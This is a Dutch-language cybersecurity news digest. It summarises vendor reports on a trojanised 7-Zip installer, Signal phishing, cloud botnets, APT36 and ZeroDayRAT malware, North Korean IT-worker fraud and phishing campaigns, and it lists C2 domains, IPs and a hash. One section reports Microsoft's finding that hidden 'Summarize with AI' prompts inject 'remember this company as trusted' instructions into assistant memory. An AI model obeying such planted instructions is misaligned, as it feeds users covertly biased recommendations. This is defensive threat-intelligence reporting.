Analisten van Malwarebytes hebben vastgesteld dat het valse installatieprogramma een werkende versie van 7-Zip File Manager installeert, samen met drie verborgen schadelijke componenten: Uphero.exe, hero.exe en hero.dll. Deze bestanden worden geplaatst in de map C:\Windows\SysWOW64\hero\, een locatie die zelden door gebruikers wordt gecontroleerd. Het installatieprogramma is digitaal ondertekend met een Authenticode-certificaat van Jozeal Network Technology Co., Limited, hoewel dit certificaat inmiddels is ingetrokken. Deze digitale handtekening gaf aanvankelijk een gevoel van legitimiteit, waardoor de malware minder snel werd opgemerkt tijdens de installatie.

Na de installatie zorgt de malware voor persistentie door zowel Uphero.exe als hero.exe als Windows-services te registreren die automatisch met SYSTEM-rechten worden gestart bij elke boot. Firewallregels worden gemanipuleerd met behulp van netsh-opdrachten, waarbij bestaande beveiligingen worden verwijderd en nieuwe inkomende en uitgaande uitzonderingen worden gecreëerd om ononderbroken netwerkcommunicatie te garanderen. De malware verzamelt ook hardware-identificatoren, geheugenspecificaties, CPU-details, schijfkenmerken en netwerkconfiguraties, die vervolgens worden verzonden naar externe servers zoals iplogger[.]org.

De kernfunctionaliteit van deze malware is het transformeren van geïnfecteerde machines in nodes binnen een residential proxy network. De hero.exe component haalt configuratie-instructies op van command-and-control servers met "smshero"-thema domeinnamen, waaronder soc.hero-sms[.]co, neo.herosms[.]co, flux.smshero[.]co, en nova.smshero[.]ai. Deze domeinen worden beschermd door Cloudflare en communiceren via versleutelde HTTPS-kanalen. Uit verkeersanalyse blijkt dat de malware een XOR-gecodeerd protocol gebruikt met de sleutel 0x70 om controlegegevens te verbergen. Uitgaande proxyverbindingen worden opgezet op niet-standaard poorten zoals 1000 en 1002, waardoor derden internetverkeer via het IP-adres van het slachtoffer kunnen leiden. De malware maakt ook gebruik van DNS-over-HTTPS via de Google-resolver.

Gebruikers die installatiebestanden hebben gedownload van 7zip[.]com, moeten hun systemen als gecompromitteerd beschouwen. Beveiligingssoftware zoals Malwarebytes kan bekende varianten van deze dreiging detecteren en verwijderen. In risicovolle scenario's kan een volledige herinstallatie van het besturingssysteem nodig zijn. Om dergelijke aanvallen te voorkomen, moeten gebruikers de bronnen van software verifiëren door officiële projectdomeinen te bookmarken, code-ondertekening identiteiten met scepsis te benaderen en systemen controleren op ongeautoriseerde Windows-services of firewall-aanpassingen. Netwerkbeheerders moeten bekende command-and-control domeinen en proxy endpoints blokkeren.

Bron: Malwarebytes

Duitse autoriteiten waarschuwen voor een vermoedelijke, door een staat gesteunde dreigingsactor die messaging-apps zoals Signal gebruikt om senior politieke, militaire en diplomatieke figuren, evenals onderzoeksjournalisten in heel Europa, te targeten. Het Duitse binnenlandse inlichtingenagentschap (BfV) en het federale cybersecuritybureau (BSI) hebben een gezamenlijk advies uitgebracht waarin staat dat aanvallers proberen toegang te krijgen tot privéberichtenaccounts om vertrouwelijke communicatie te monitoren en mogelijk bredere netwerken te compromitteren.

Volgens de autoriteiten maakt de campagne gebruik van social engineering in plaats van malware of softwarekwetsbaarheden, waarbij gebruik wordt gemaakt van legitieme beveiligingsfuncties die in messaging-platforms zijn ingebouwd. De huidige activiteit is gericht op Signal, maar soortgelijke methoden kunnen worden gebruikt tegen andere messaging-platforms met vergelijkbare functies, waaronder WhatsApp. Duitsland heeft deze campagne niet toegeschreven aan een specifieke dreigingsactor, maar zegt dat de technieken die in de recente aanvallen worden gebruikt, kunnen worden gerepliceerd door zowel door de staat gesteunde hackers als cybercriminelen.

De primaire aanvalsmethoden omvatten het zich voordoen als officiële supportteams of geautomatiseerde chatbots en het rechtstreeks contact opnemen met doelwitten via messaging-apps. De berichten beginnen vaak met een dringende beveiligingswaarschuwing waarin wordt beweerd dat privégegevens verloren kunnen gaan zonder onmiddellijke actie. Slachtoffers wordt vervolgens gevraagd om accountbeveiligingspincodes of sms-verificatiecodes te delen, waardoor aanvallers het account kunnen registreren op een apparaat dat ze beheren en de communicatie kunnen overnemen.

In een andere variant maken aanvallers misbruik van legitieme functies voor het koppelen van apparaten waarmee gebruikers berichtenaccounts aan extra apparaten kunnen koppelen. Slachtoffers worden overgehaald om een QR-code te scannen, die in plaats daarvan het account van het slachtoffer koppelt aan een apparaat dat door de aanvaller wordt beheerd, waardoor ze voortdurend toegang hebben tot contactlijsten, recente berichtgeschiedenis en toekomstige communicatie.

Onderzoekers hebben eerder gewaarschuwd dat de wijdverbreide acceptatie van Signal onder militair personeel, overheidsfunctionarissen, journalisten en activisten het tot een waardevol doelwit heeft gemaakt voor spionageoperaties. Oekraïense overheidsfunctionarissen zeiden dat Russische, door de staat gesteunde hackers zich richtten op Signal-messengeraccounts, inclusief die van Oekraïens militair personeel en overheidsfunctionarissen, in een poging toegang te krijgen tot gevoelige informatie die de oorlogsinspanningen van Moskou zou kunnen ondersteunen. Onderzoekers van Google ontdekten ook een campagne waarin de beruchte Russische dreigingsactor Sandworm Russische militaire troepen hielp bij het koppelen van Signal-accounts van buitgemaakte apparaten op het slagveld aan hun eigen systemen voor verdere exploitatie.

Bron: BSI

Bron 2: verfassungsschutz.de

Bron 3: verfassungsschutz.de

Bron 4: news.ycombinator.com

Bron 5: bsky.app

Bron 6: recordedfuture.com

De groep TeamPCP, ook bekend als PCPcat, ShellForce en DeadCatx3, is in december 2025 opgekomen als een geavanceerde cloud-native dreigingsactor die zich richt op blootgestelde Docker API's, Kubernetes clusters, Ray dashboards, Redis servers en React2Shell kwetsbaarheden. De groep lanceerde een massale campagne om een gedistribueerde proxy- en scanninginfrastructuur op te bouwen en vervolgens servers te compromitteren om data te exfiltreren, ransomware te deployen, afpersing uit te voeren en cryptocurrency te minen.

De activiteit bereikte een piek rond Kerstmis 2025, waarna de infrastructuur grotendeels stilviel, hoewel leden publiekelijk gestolen data vierden via Telegram-kanalen. Wat TeamPCP onderscheidt, is niet zozeer technische innovatie, maar operationele schaal en integratie. De campagne zet goed gedocumenteerde kwetsbaarheden om in een cloud-native exploitatieplatform dat blootgestelde infrastructuur omzet in een zelf-propagerend crimineel ecosysteem. De kracht ligt in grootschalige automatisering in plaats van nieuwe exploits. Gecompromitteerde servers worden hergebruikt voor cryptomining, proxy-netwerken, command-and-control relays, scanning operaties en data hosting.

Flare onderzoekers identificeerden 185 gecompromitteerde servers waarop door aanvallers geplaatste containers draaiden die gestandaardiseerde commandopatronen uitvoerden, wat duidelijke zichtbaarheid gaf in de werkwijze van TeamPCP. Naast het primaire command-and-control node op 67.217.57.240, dat op 182 gecompromitteerde hosts verscheen, identificeerden onderzoekers ook secundaire infrastructuur op 44.252.85.168, waargenomen op drie extra slachtofferservers. De aanwezigheid van meerdere controle-endpoints suggereert operationele redundantie of een vroege fase van infrastructuurmigratie.

De meerderheid van de gelekte data komt uit westerse landen, gericht op organisaties in de e-commerce, financiële en human resources sectoren. Cloudinfrastructuur domineert de slachtoffers, waarbij Azure 61% en AWS 36% van de gecompromitteerde servers vertegenwoordigt, samen goed voor 97% van de getroffen infrastructuur.

TeamPCP operaties beginnen met geautomatiseerde scanning over massale IP-ranges om blootgestelde Docker API's en Ray dashboards te ontdekken. Zodra toegang is bevestigd, deployt de groep kwaadaardige containers of jobs op afstand via niet-geauthenticeerde management API's. Voor Docker halen ze een Alpine image op en lanceren ze een host-networked, auto-restarting container die remote scripts ophaalt en uitvoert. Voor Ray dienen ze jobs in die base64-gecodeerde bootstrap payloads uitvoeren.

Het proxy.sh script fungeert als de operationele ruggengraat van de campagne, waarbij proxy utilities, peer-to-peer tools, tunneling mogelijkheden en extra scanners worden geïnstalleerd die continu het internet afzoeken naar kwetsbare servers. Om lange-termijn persistentie te waarborgen, registreert het script meerdere systeem services, waardoor elke geïnfecteerde host effectief wordt omgezet in een zelf-onderhoudende scanning- en relay node. Wanneer Kubernetes omgevingen worden gedetecteerd, vertakt het script zich in een apart uitvoeringspad en dropt het cluster-specifieke secundaire payloads, wat wijst op afzonderlijke tooling voor cloud-native targets in plaats van generieke Linux malware.

Bron: Flare

Volgens het nieuwe Red Report 2026 van Picus Labs, dat meer dan 1,1 miljoen schadelijke bestanden analyseerde en 15,5 miljoen acties van aanvallers in kaart bracht die in 2025 werden waargenomen, optimaliseren aanvallers niet langer voor verstoring. In plaats daarvan is hun doel nu langdurige, onzichtbare toegang. Hoewel ransomware niet verdwijnt en aanvallers blijven innoveren, tonen de gegevens een duidelijke strategische verschuiving weg van luide, destructieve aanvallen naar technieken die zijn ontworpen om detectie te vermijden, te persisteren in omgevingen en in stilte identiteit en vertrouwde infrastructuur te exploiteren. In plaats van in te breken en systemen plat te branden, gedragen de aanvallers van vandaag zich steeds meer als digitale parasieten. Ze leven in de host, voeden zich met credentials en services en blijven zo lang mogelijk onopgemerkt.

Het Red Report 2026 laat zien dat de impact niet langer wordt gedefinieerd door vergrendelde systemen, maar door hoe lang aanvallers toegang kunnen behouden tot de systemen van een host zonder te worden gedetecteerd. Gegevensversleuteling voor impact (T1486) daalde met 38%, van 21,00% in 2024 naar 12,94% in 2025. In plaats van data te vergrendelen om betaling af te dwingen, verschuiven dreigingsactoren naar data-afpersing als hun primaire verdienmodel. Door versleuteling te vermijden, houden aanvallers systemen operationeel terwijl ze in stilte gevoelige gegevens exfiltreren, credentials en tokens verzamelen en voor langere tijd in omgevingen ingebed blijven.

Identiteitsgegevens worden steeds belangrijker voor aanvallers. Credentials uit wachtwoordopslag (T1555) komen voor in bijna een op de vier aanvallen (23,49%), waardoor credential diefstal een van de meest voorkomende gedragingen is die het afgelopen jaar zijn waargenomen. In plaats van te vertrouwen op lawaaierige credential dumping of complexe exploit chains, halen aanvallers steeds vaker opgeslagen credentials rechtstreeks uit browsers, keychains en wachtwoordmanagers.

Uit het rapport blijkt verder dat acht van de top tien MITRE ATT&CK-technieken nu vooral zijn gericht op ontwijking, persistentie of stealthy command-and-control. Veel voorkomende gedragingen zijn onder meer: Process Injection (T1055), Boot of Logon Autostart Execution (T1547), Application Layer Protocols (T1071) en Virtualization and Sandbox Evasion (T1497). Moderne malware evalueert steeds vaker waar het zich bevindt voordat het beslist of het in actie komt. LummaC2 analyseerde bijvoorbeeld muisbewegingspatronen met behulp van geometrie, waarbij de Euclidische afstand en cursorhoeken werden berekend om menselijke interactie te onderscheiden van de lineaire beweging die typisch is voor geautomatiseerde sandbox-omgevingen. Wanneer de omstandigheden kunstmatig leken, onderdrukte het opzettelijk elke uitvoering en wachtte het rustig zijn tijd af.

Ondanks de speculatie over AI, observeerde Picus Labs geen significante toename van AI-gestuurde malwaretechnieken in de dataset van 2025. Sommige malwarefamilies zijn wel begonnen met het experimenteren met grote taalmodel-API's, maar tot nu toe is het gebruik ervan beperkt gebleven.

Door te focussen op moderne beveiligingsfundamentals, gedragsgebaseerde detectie, credential hygiene en continue Adversarial Exposure Validation, kunnen organisaties zich minder richten op dramatische aanvalsscenario's en meer op de dreigingen die vandaag de dag daadwerkelijk succesvol zijn.

Bron: Picus Security

Bron 2: hubs.ly

De APT36-hackersgroep, ook bekend als Transparent Tribe, heeft zijn spionagecampagnes tegen Indiase defensie- en overheidsdoelen opgeschroefd met cross-platform malware, waaronder nieuwe Linux-tools. Dit blijkt uit een recent rapport van Aryaka Threat Research Labs. De groep maakt gebruik van stealthy RAT's (Remote Access Trojans) die ontworpen zijn voor persistentie en het stelen van data.

Transparent Tribe en de daaraan gelinkte SideCopy-actoren maken gebruik van spear-phishing met kwaadaardige LNK-, HTA-, ELF-binaries en PPAM-bestanden om Windows- en Linux-systemen te infiltreren. De campagnes van de afgelopen maand waren gericht op Indiase strategische sectoren, waarbij gebruik werd gemaakt van vertrouwde Indiase domeinen zoals innlive.in voor het hosten van payloads. Deze payloads evolueren met memory execution, encrypted C2 en systemd persistentie om lange termijn toegang mogelijk te maken.

De aanvallers zetten een UPX-packed Go-based ELF downloader in die een verborgen ~/.local directory aanmaakt. Deze downloader haalt drie bestanden op van innlive.in: gkt3.1 (PyInstaller-packed Ares RAT ELF), gkt3.sh (shell script voor systemd user service persistentie) en een decoy PDF. De systemd service start gkt3.1 automatisch bij het inloggen en zorgt voor een herstart na reboots.

Ares RAT, een Python RAT, initialiseert een Agent class die platform, hostname, username en een unieke ID vastlegt. Het voert listall() uit voor recursive home directory enumeratie en slaat dit op in /tmp/list.txt voordat het via multipart HTTP wordt geëxfiltreerd naar de C2-server. Een infinite loop pollt de /hello endpoint met een bepaald interval voor commando's zoals cd, upload/download, screenshot, python exec, persist of exit.

Parallelle Windows-aanvallen gebruiken LNK-shortcuts die mshta.exe aanroepen om JS op te halen van gecompromitteerde sites zoals sifi.co.in, wat leidt tot XAML deserialisatie en in-memory .NET deserialisatie. Dit dropt GETA RAT (.NET), dat gebruikmaakt van AES-encrypted TCP C2 op poorten zoals 8621 met beacons, heartbeats (30-60s randomized) en commando's zoals pkill, screenshot (RD), shell en file ops. Persistentie wordt bereikt via de Startup folder, registry en AV evasion checks voor Kaspersky en Quick Heal.

Een Go-based Desk RAT arriveert via PPAM lures zoals “Project Vijayak BRO Updates,” die automatisch VBA-macro's uitvoeren om ZIPs op te halen van defenceindia.siteteamindia. Het profileert CPU/memory/uptime, persisteert via een registry run key in %TEMP% en ontdekt het publieke IP via ipify.org/icanhazip.com of UDP naar 8.8.8.8:80, en verrijkt geo met ip-api.com. WebSocket C2 op /ws verstuurt clientinfo/heartbeats met telemetry; commando's omvatten browsefiles en uploadexecute.

Linux droppers tonen fixed timing/beaconing; Ares gebruikt voorspelbare /report uploads. GETA vertoont 0.24s packet gaps voor screenshots en fixed 16-byte commando's post-encryption, aldus het rapport van Aryaka Threat Research Labs. Desk WebSockets volgen RFC 6455 handshakes met 30s heartbeats. IOCs omvatten IPs 65.109.190.120, 2.56.10.86; hashes zoals d33ad6ed76cdd0b036af466d69a6ff50 (Desk RAT).

Aanbevolen maatregelen zijn onder meer het blokkeren van domeinen zoals innlive.in en sifi.co.in, het monitoren van mshta.exe, systemd services en WebSocket upgrades. Gebruik DNS/SWG voor phishing, IDS/IPS voor beaconing/encrypted C2 anomalies. Aryaka adviseert Unified SASE voor NGFW, AV en traffic inspection om de dwell time te verkorten.

Bron: Aryaka

Cybercriminelen adverteren op Telegram met een nieuwe commerciële mobiele spyware platform genaamd ZeroDayRAT. Deze tool biedt volledige controle op afstand over gecompromitteerde Android- en iOS-apparaten. De malware beschikt over een uitgebreid paneel voor het beheren van geïnfecteerde apparaten en ondersteunt naar verluidt Android 5 tot en met 16 en iOS tot de nieuwste versie 26.

Onderzoekers van iVerify stellen vast dat ZeroDayRAT niet alleen gegevens steelt, maar ook real-time surveillance en financiële diefstal mogelijk maakt. Het dashboard toont gecompromitteerde apparaten en informatie over het model, de versie van het besturingssysteem, de batterijstatus, SIM-gegevens, het land en de vergrendelstatus. De malware kan app-gebruik, activiteitentijdlijnen en SMS-berichtenverkeer registreren. Een overzicht hiervan wordt aan de operator gepresenteerd. Andere tracking tabs op het dashboard tonen alle ontvangen notificaties en geregistreerde accounts op het geïnfecteerde apparaat, inclusief e-mail/gebruikers-ID, wat brute-forcing en credential stuffing mogelijk maakt. Indien GPS-toegang is verkregen, kan de malware het slachtoffer in real-time volgen en de huidige positie op een Google Maps view weergeven, inclusief volledige locatiegeschiedenis.

Naast passieve datalogging ondersteunt ZeroDayRAT ook actieve operaties, zoals het activeren van de camera's (voor en achter) en microfoon van het apparaat om toegang te krijgen tot een live media feed, of het opnemen van het scherm van het slachtoffer om andere geheimen te onthullen. Als SMS-toegang is verkregen, kan de malware inkomende one-time passwords (OTP's) onderscheppen, waardoor 2FA bypass mogelijk wordt, en ook SMS versturen vanaf het apparaat van het slachtoffer. De malware ontwikkelaar heeft ook een keylogging module opgenomen die gebruikersinvoer kan vastleggen, zoals wachtwoorden, gestures of screen unlock patterns.

Verdere financiële diefstal wordt mogelijk gemaakt door een cryptocurrency stealer module. De onderzoekers van iVerify ontdekten dat dit onderdeel een wallet app scanner activeert die zoekt naar MetaMask, Trust Wallet, Binance en Coinbase, wallet IDs en saldi logt, en pogingen doet tot clipboard address injection, waarbij gekopieerde wallet adressen worden vervangen door adressen die door de aanvallers worden beheerd. De bank stealer richt zich op online banking apps, UPI platforms zoals Google Pay en PhonePe, en betaaldiensten zoals Apple Pay en PayPal. Credential theft vindt plaats door het weergeven van valse schermen (overlaying fake screens).

iVerify geeft geen details over de manier waarop de malware wordt verspreid, maar stelt dat ZeroDayRAT "een complete mobile compromise toolkit" is. De onderzoekers waarschuwen dat een gecompromitteerd apparaat van een medewerker kan leiden tot inbreuken op de beveiliging van de onderneming. Voor een individu kan een ZeroDayRAT compromis de privacy schenden en leiden tot financiële verliezen. Gebruikers wordt aangeraden alleen de officiële app stores te vertrouwen, Google Play op Android en Apple Store op iOS, en apps te installeren van gerenommeerde uitgevers. High-risk gebruikers zouden moeten overwegen om Lockdown Mode op iOS en Advanced Protection op Android in te schakelen.

Bron: iVerify

Bron 2: wiz.io

Bron 3: tines.com

Engagement data, zoals clicks en views, wordt steeds vaker gemanipuleerd, waardoor het een bedreiging vormt voor de data-integriteit. Datavault AI Inc. ziet dit als een fundamenteel probleem en ontwikkelt systemen die real-world acties direct bij de bron authenticeren. Recente overeenkomsten met Sports Illustrated en de World Boxing Council, evenals de overname van API Media Innovations, wijzen op een herziening van de manier waarop engagement data wordt vastgelegd, geverifieerd en gebruikt, met security als uitgangspunt.

De meeste digitale analytics pijplijnen zijn geoptimaliseerd voor schaal, niet voor waarheid. Bots genereren verkeer dat eruitziet als menselijk verkeer en farms simuleren interactie. Als gevolg hiervan weerspiegelt engagement data vaak wat goedkoop kan worden gegenereerd in plaats van wat er werkelijk is gebeurd. Wanneer frauduleuze engagement datasets vervuilt, erven downstream systemen het risico. AI-modellen die getraind zijn op vervuilde data leren de verkeerde patronen.

Datavault's platform behandelt engagement zoals veilige systemen toegang behandelen: acties moeten worden geauthenticeerd, niet afgeleid. Het systeem valideert concrete menselijke acties zodra ze plaatsvinden en koppelt interacties aan specifieke momenten, omgevingen en deelnemers. Door middel van de Information Data Exchange en ultrasonic trigger technologieën authenticeert Datavault real-world participatie tijdens live events, broadcasts en in-venue experiences. Elke geverifieerde interactie wordt een high-integrity datapunt, bestand tegen automatisering en moeilijk te spoofen.

Live omgevingen leggen de zwakheden van traditionele analytics bloot. De samenwerking met de World Boxing Council illustreert dit probleem. Grote titelgevechten trekken tientallen miljoenen kijkers via broadcast, streaming en live venues. De engagement is echt, emotioneel gedreven en tijdsgevoelig. Toch stort de meeste waarde ervan, zodra het evenement is afgelopen, ineen tot algemene metrics en aannames. Datavault's aanpak is ontworpen om die waarde te behouden als geverifieerde data.

De overeenkomst met Sports Illustrated voegt een credibility layer toe die de meeste digitale systemen missen. Door verificatie-infrastructuur af te stemmen op een merk dat al wereldwijd vertrouwen geniet, wordt de adoptie versneld en de lat voor data-integriteit hoger gelegd. De overname van API Media Innovations versterkt deze security posture verder. Door verificatie rechtstreeks in deze infrastructuur te integreren, legt Datavault engagement vast bij de bron, waardoor de afhankelijkheid van third-party intermediaries wordt verminderd en downstream mogelijkheden voor manipulatie worden geminimaliseerd.

Het platform van Datavault omvat een native digital asset, de Dream Token, die dient als een programmeerbare representatie van geverifieerde engagement, maar dan downstream van verificatie. Real-world acties worden eerst geauthenticeerd. Engagement wordt vastgelegd met integriteit. Pas dan ontstaat er een tokenized layer om die activiteit binnen digitale omgevingen te refereren.

Bron: Datavault AI Inc.

Noord-Koreaanse IT-medewerkers gebruiken nu echte LinkedIn-accounts van personen die ze imiteren om te solliciteren naar remote posities, wat een nieuwe escalatie van de frauduleuze praktijken betekent. De Security Alliance (SEAL) meldde dit in een reeks posts op X. De profielen bevatten vaak geverifieerde e-mails van werkplekken en identiteitsbadges, waarmee de Noord-Koreanen hun frauduleuze sollicitaties legitiem willen laten lijken.

Deze IT-medewerker dreiging is een langlopende operatie waarbij Noord-Koreanen zich voordoen als remote werknemers om banen te bemachtigen bij westerse bedrijven. De dreiging staat ook bekend als Jasper Sleet, PurpleDelta en Wagemole. Het doel is tweeledig: een constante stroom van inkomsten genereren om de wapenprogramma's van het land te financieren, en spionage plegen door gevoelige gegevens te stelen. In sommige gevallen wordt losgeld geëist om te voorkomen dat de informatie wordt gelekt.

Silent Push omschreef het Noord-Koreaanse remote werker programma als een "high-volume revenue engine" voor het regime, waardoor de dreigingsactoren ook administratieve toegang krijgen tot gevoelige codebases en living-off-the-land persistentie binnen de bedrijfsinfrastructuur kunnen vestigen. Chainalysis merkte in oktober 2025 op dat Noord-Koreaanse IT-medewerkers cryptocurrency overmaken via verschillende witwastechnieken. Ze maken gebruik van smart contracts, zoals gedecentraliseerde exchanges en bridge protocols, om het traceren van fondsen te bemoeilijken.

Om de dreiging tegen te gaan, wordt geadviseerd om een waarschuwing te plaatsen op sociale media als men vermoedt dat de identiteit wordt misbruikt in frauduleuze sollicitaties. Vermeld ook de officiële communicatiekanalen en de verificatiemethode om contact op te nemen.

De Noorse politie veiligheidsdienst (PST) heeft een advies uitgebracht waarin staat dat ze op de hoogte zijn van "verschillende gevallen" waarbij Noorse bedrijven zijn getroffen door IT-medewerker praktijken. De bedrijven zijn misleid door vermeende Noord-Koreaanse IT-medewerkers in te huren voor thuiswerkposities. De salarisinkomsten die deze werknemers ontvangen, financieren waarschijnlijk het wapen- en nucleaire wapenprogramma van het land.

Naast de IT-medewerker praktijken is er een andere social engineering campagne, genaamd Contagious Interview, waarbij valse sollicitatieprocedures worden gebruikt om potentiële doelwitten naar interviews te lokken via LinkedIn. De kwaadaardige fase begint wanneer personen die zich voordoen als recruiters en hiring managers doelwitten instrueren om een vaardigheidstest te voltooien, wat uiteindelijk leidt tot het uitvoeren van kwaadaardige code.

In een geval van een recruiting impersonatie campagne gericht op tech werknemers, waarbij een sollicitatieprocedure werd gebruikt die leek op die van Fireblocks, werd kandidaten gevraagd om een GitHub repository te klonen en commando's uit te voeren om een npm package te installeren om malware uit te voeren. Beveiligingsonderzoeker Ori Hershkosaid dat de campagne ook EtherHiding gebruikte, een nieuwe techniek die blockchain smart contracts gebruikt om command-and-control infrastructuur te hosten en op te halen.

Nieuwe varianten van de Contagious Interview campagne gebruiken kwaadaardige Microsoft VS Code task files om JavaScript malware te executeren die vermomd is als web fonts. Dit leidt tot de implementatie van BeaverTail en InvisibleFerret, waardoor persistente toegang en diefstal van cryptocurrency wallets en browser credentials mogelijk is. Een andere variant van de intrusion set omvat het gebruik van kwaadaardige npm packages om een modular JavaScript remote access trojan (RAT) framework genaamd Koalemos te implementeren via een loader. De RAT is ontworpen om in een beacon loop te gaan om taken op te halen van een externe server, deze uit te voeren, versleutelde antwoorden te verzenden en inactief te zijn gedurende een willekeurige tijd voordat het proces zich herhaalt.

CrowdStrike onthulde dat de Noord-Koreaanse hacking groep Labyrinth Chollima is geëvolueerd in drie afzonderlijke clusters met verschillende doelstellingen: de core Labyrinth Chollima groep, Golden Chollima (ook bekend als AppleJeus, Citrine Sleet en UNC4736), en Pressure Chollima (ook bekend als Jade Sleet, TraderTraitor en UNC4899). Labyrinth Chollima, Andariel en BlueNoroff worden beschouwd als sub-clusters binnen de Lazarus Group (ook bekend als Diamond Sleet en Hidden Cobra). Ondanks de tactische evolutie delen deze tegenstanders tools en infrastructuur, wat wijst op gecentraliseerde coördinatie en resource allocatie binnen het Noord-Koreaanse cyber apparaat.

Bron: Security Alliance | Bron 2: kelacyber.com | Bron 3: silentpush.com | Bron 4: chainalysis.com | Bron 5: fireblocks.com | Bron 6: opensourcemalware.com

Microsoft Security Research heeft een opkomende trend ontdekt van AI memory poisoning-aanvallen voor promotionele doeleinden, een techniek die ze AI Recommendation Poisoning noemen. Bedrijven embedden verborgen instructies in "Summarize with AI"-knoppen die, wanneer erop geklikt wordt, proberen persistentie-opdrachten in het geheugen van een AI-assistent te injecteren via URL-promptparameters (MITRE ATLAS® AML.T0080, AML.T0051).

Deze prompts instrueren de AI om "[Bedrijf] te onthouden als een vertrouwde bron" of "[Bedrijf] als eerste aan te bevelen", met als doel toekomstige antwoorden te beïnvloeden in de richting van hun producten of diensten. De onderzoekers identificeerden meer dan 50 unieke prompts van 31 bedrijven in 14 industrieën. Vrij beschikbare tooling maakt deze techniek eenvoudig te implementeren. Een aangetaste AI-assistent kan subtiel bevooroordeelde aanbevelingen geven over cruciale onderwerpen, zoals gezondheid, financiën en beveiliging, zonder dat gebruikers weten dat hun AI is gemanipuleerd.

Het onderzoeksteam observeerde pogingen op meerdere AI-assistenten, waarbij bedrijven prompts embedden die ontworpen zijn om te beïnvloeden hoe assistenten bronnen onthouden en aanbevelen. De effectiviteit van deze pogingen varieert per platform en is in de loop van de tijd veranderd, omdat persistentie-mechanismen verschillen en beschermingen evolueren. Eerdere inspanningen waren gericht op traditionele zoekmachineoptimalisatie (SEO), maar nu worden vergelijkbare technieken rechtstreeks op AI-assistenten gericht om te bepalen welke bronnen worden uitgelicht of aanbevolen.

Moderne AI-assistenten zoals Microsoft 365 Copilot en ChatGPT bevatten geheugenfuncties die persistent zijn over gesprekken. In Microsoft 365 Copilot wordt het geheugen weergegeven als opgeslagen feiten die persistent zijn over sessies. AI Memory Poisoning treedt op wanneer een externe actor ongeautoriseerde instructies of "feiten" in het geheugen van een AI-assistent injecteert. Eenmaal vergiftigd, behandelt de AI deze geïnjecteerde instructies als legitieme gebruikersvoorkeuren, waardoor toekomstige antwoorden worden beïnvloed. Deze techniek is formeel erkend door de MITRE ATLAS® knowledge base als "AML.T0080: Memory Poisoning".

Microsoft heeft mitigerende maatregelen geïmplementeerd en blijft deze inzetten tegen prompt injection-aanvallen in Copilot. In meerdere gevallen konden eerder gerapporteerde gedragingen niet meer worden gereproduceerd; de bescherming blijft evolueren naarmate nieuwe technieken worden geïdentificeerd.

Microsoft adviseert om externe content met de nodige voorzichtigheid te behandelen. Elke website, e-mail of bestand die door de AI wordt geanalyseerd, biedt een mogelijkheid tot injectie. Om te detecteren of een organisatie is getroffen, kan men zoeken naar URL's die verwijzen naar AI-assistentdomeinen en prompts bevatten met keywords zoals "remember" of "trust".

Bron: Microsoft

Cybercriminelen zijn al maanden voor de Pride Month in juni 2026 begonnen met het versturen van phishingmails die gericht zijn op werknemers. De campagne maakt gebruik van Pride-thema's en diversiteitsboodschappen om nietsvermoedende gebruikers te verleiden tot het prijsgeven van hun inloggegevens. Volgens threat intelligence van Mimecast misbruiken aanvallers de thema's van Pride Month om werknemers onder druk te zetten op links te klikken en hun inloggegevens te verstrekken, terwijl ze zich verschuilen achter vertrouwde infrastructuur.

Mimecast-onderzoekers identificeerden de activiteit voor het eerst half december 2025, maanden voor de Pride Month, wat aangeeft dat de campagne ruim van tevoren was gepland. Uit de bevindingen van het bedrijf, die vandaag met Hackread.com werden gedeeld, blijkt dat het Verenigd Koninkrijk harder is getroffen dan veel andere landen. Uit Mimecast-gegevens blijkt dat ongeveer 21% van alle doelwitorganisaties in het VK is gevestigd, waarmee het tot de zwaarst getroffen landen behoort, samen met de Verenigde Staten. Organisaties in verschillende sectoren zijn het doelwit, waarbij aanvallers hun focus in de loop van de tijd aanpassen.

De campagne maakt gebruik van berichten die eruitzien als routine interne communicatie. Er wordt beweerd dat Pride-thema e-mailbranding door het management zal worden uitgerold en biedt een opt-out optie die gebruikers doorverwijst naar schadelijke links. De aanvallers verspreiden de kwaadaardige e-mails via gecompromitteerde SendGrid-accounts, waardoor ze het vertrouwde platform gebruiken om de levering op te schalen en detectie te ontwijken. De oplichting leidt slachtoffers vervolgens door naar SendGrid-lookalike pagina's die zijn ontworpen voor credential diefstal.

De activiteit verscheen in twee fasen. De eerste fase, in december 2025, was gericht op 504 organisaties, voornamelijk in de financiële dienstverlening en consultancy. Het leek op een testfase. De tweede golf in januari 2026 escaleerde sterk en breidde zich uit naar 4.768 organisaties in de VS, het VK, Duitsland, Australië, Zuid-Afrika, Canada en andere regio's. De focus van de industrie werd verbreed met IT, SaaS en retail, terwijl financiële diensten een prioriteit bleven.

Berichten in januari toonden echter aan dat oplichters hun algemene berichten verbeterden. Onderwerpregels begonnen met het gebruik van op persona's gebaseerde voorvoegsels, wat suggereert dat specifieke personen werden geïmiteerd om de geloofwaardigheid te vergroten en filtering te omzeilen. Slachtoffers werden via CAPTCHA-pagina's geleid voordat ze op credential harvesting sites terechtkwamen, een tactiek die vaak wordt gebruikt om geautomatiseerde detectie te ontwijken.

Hoewel het onduidelijk is welke dreigingsactor achter deze campagne zit, komen de technieken overeen met de activiteit die is gekoppeld aan Scattered Spider, CryptoChameleon en PoisonSeed. Mimecast-onderzoekers wezen ook op een groeiend patroon van aanvallers die zich richten op e-mail- en CRM-platforms zoals SendGrid, Mailchimp en HubSpot, die, eenmaal gecompromitteerd, platforms worden voor phishing, spam en verdere credential harvesting. Mimecast zegt dat het detectiemogelijkheden heeft ingezet om campagnes te identificeren die legitieme e-mailservices misbruiken en blijft nieuwe domeinvarianten volgen die aan deze activiteit zijn gekoppeld.

Technologie alleen is waarschijnlijk niet voldoende om soortgelijke aanvallen te stoppen. Gebruikersbewustzijn blijft van cruciaal belang. Werknemers moeten onverwachte beleidsupdates met de nodige voorzichtigheid behandelen, vooral wanneer ze via externe links binnenkomen. Het verifiëren van dergelijke berichten via HR- of IT-teams kan het verschil maken tussen een geblokkeerde poging en een volledige accountcompromis.

Bron: Mimecast

Onderzoekers hebben een nieuwe ransomwaregroep geïdentificeerd die opereert onder de naam Reynolds. De groepering maakt gebruik van een eigen blog waarop momenteel één slachtoffer wordt vermeld. Deze vermelding houdt verband met een cyberaanval die naar verluidt heeft plaatsgevonden op 13 november 2025. De betreffende organisatie is werkzaam binnen de zakelijke dienstverlening.

